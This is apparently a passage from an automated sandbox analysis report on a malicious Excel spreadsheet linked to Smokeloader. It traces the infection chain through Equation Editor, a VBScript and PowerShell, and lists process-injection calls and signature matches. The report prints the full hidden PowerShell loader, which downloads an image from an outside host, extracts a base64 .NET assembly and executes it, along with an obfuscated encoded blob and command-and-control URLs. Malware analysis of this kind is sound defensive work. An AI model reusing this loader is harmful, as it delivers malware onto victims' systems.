gTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,13_2_00402321
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004025D3 NtClose,13_2_004025D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014EB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00402686 NtClose,13_2_00402686
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040328D GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtOpenKey,tolower,towlower,13_2_0040328D
            Source: C:\Windows\explorer.exeCode function: 14_2_026E4760 NtCreateSection,14_2_026E4760
            Source: C:\Windows\explorer.exeCode function: 14_2_026E2FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,CloseHandle,14_2_026E2FAC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00084B92 RtlMoveMemory,NtUnmapViewOfSection,18_2_00084B92
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000833C3 NtQueryInformationFile,18_2_000833C3
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0008342B NtQueryObject,NtQueryObject,RtlMoveMemory,18_2_0008342B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0008349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,18_2_0008349B
            Source: C:\Windows\explorer.exeCode function: 19_2_000638B0 NtUnmapViewOfSection,19_2_000638B0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_00081016 RtlMoveMemory,NtUnmapViewOfSection,20_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00083D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,22_2_00083D8D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00082E1B OpenProcess,lstrcmpi,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,22_2_00082E1B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081F4E NtCreateSection,NtMapViewOfSection,22_2_00081F4E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081FE5 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,22_2_00081FE5
            Source: C:\Windows\explorer.exeCode function: 23_2_00065300 RtlAllocateHeap,NtUnmapViewOfSection,23_2_00065300
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,24_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081A80 NtCreateSection,NtMapViewOfSection,24_2_00081A80
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081819 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,24_2_00081819
            Source: C:\Windows\explorer.exeCode function: 28_2_0006355C RtlAllocateHeap,NtUnmapViewOfSection,28_2_0006355C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_00081016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,29_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_00081B26 NtCreateSection,NtMapViewOfSection,29_2_00081B26
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_000818BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,29_2_000818BF
            Source: C:\Windows\explorer.exeCode function: 30_2_0006370C RtlAllocateHeap,NtUnmapViewOfSection,30_2_0006370C
            Source: C:\Windows\explorer.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_01B754A012_2_01B754A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_01B7513012_2_01B75130
            Source: C:\Windows\explorer.exeCode function: 14_2_026E284014_2_026E2840
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0008219818_2_00082198
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0008C2F918_2_0008C2F9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0009B35C18_2_0009B35C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000D443818_2_000D4438
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0009B97E18_2_0009B97E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00086E6A18_2_00086E6A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000A5F0818_2_000A5F08
            Source: C:\Windows\explorer.exeCode function: 19_2_00061E2019_2_00061E20
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_0008170B20_2_0008170B
            Source: C:\Windows\explorer.exeCode function: 23_2_00062C0023_2_00062C00
            Source: C:\Windows\explorer.exeCode function: 28_2_0006205428_2_00062054
            Source: C:\Windows\explorer.exeCode function: 28_2_0006286028_2_00062860
            Source: C:\Windows\explorer.exeCode function: 30_2_00062A0430_2_00062A04
            Source: C:\Windows\explorer.exeCode function: 30_2_000620F430_2_000620F4
            Source: #20240627_Edlen_B.xlsOLE indicator, VBA macros: true
            Source: #20240627_Edlen_B.xlsStream path 'MBD0005BCAC/\x1Ole' : http://z2.ink/zBODkMSzu4 *>mzCnLTkm_qk@5'g6K,@be1MN5CLhvWLypi4iYWSNY0yfZBYSeY7toMDkjfYhEajFkvwnNxZ5eHU9VQaaYwocnCoRpWOmOtplZBC69FmP2Ga2nnAh6NQ4fjwZuQ1bUehixpJ0Fog3iESSE4i2tL1l1YAJZ8fAwZzQYR6BHdWcbOQMqv2kRJjfbzDgzhfmV1yrVQzq)sVkfBflm]i^(~
            Source: ~WRF{E5BBB120-EEF3-40B5-B932-2B0745709A9C}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\rugtucw D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00087F70 appears 32 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00088801 appears 40 times
            Source: 0000000D.00000002.473315966.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000D.00000002.473503358.0000000000181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3308, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3404, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6619CBCE.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: classification engineClassification label: mal100.spre.bank.troj.spyw.expl.evad.winXLS@32/35@12/4
            Source: C:\Windows\explorer.exeCode function: 14_2_026E3BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,14_2_026E3BF4
            Source: C:\Windows\explorer.exeCode function: 14_2_026E35E8 CoCreateInstance,14_2_026E35E8
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\6B430000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7242.tmpJump to behavior
            Source: #20240627_Edlen_B.xlsOLE indicator, Workbook stream: true
            Source: 6B430000.1.drOLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs"
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: #20240627_Edlen_B.xlsReversingLabs: Detection: 15%
            Source: #20240627_Edlen_B.xlsVirustotal: Detection: 7%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {3AFD0624-861F-4A6A-8994-E838F818ED19} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\rugtucw C:\Users\user\AppData\Roaming\rugtucw
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
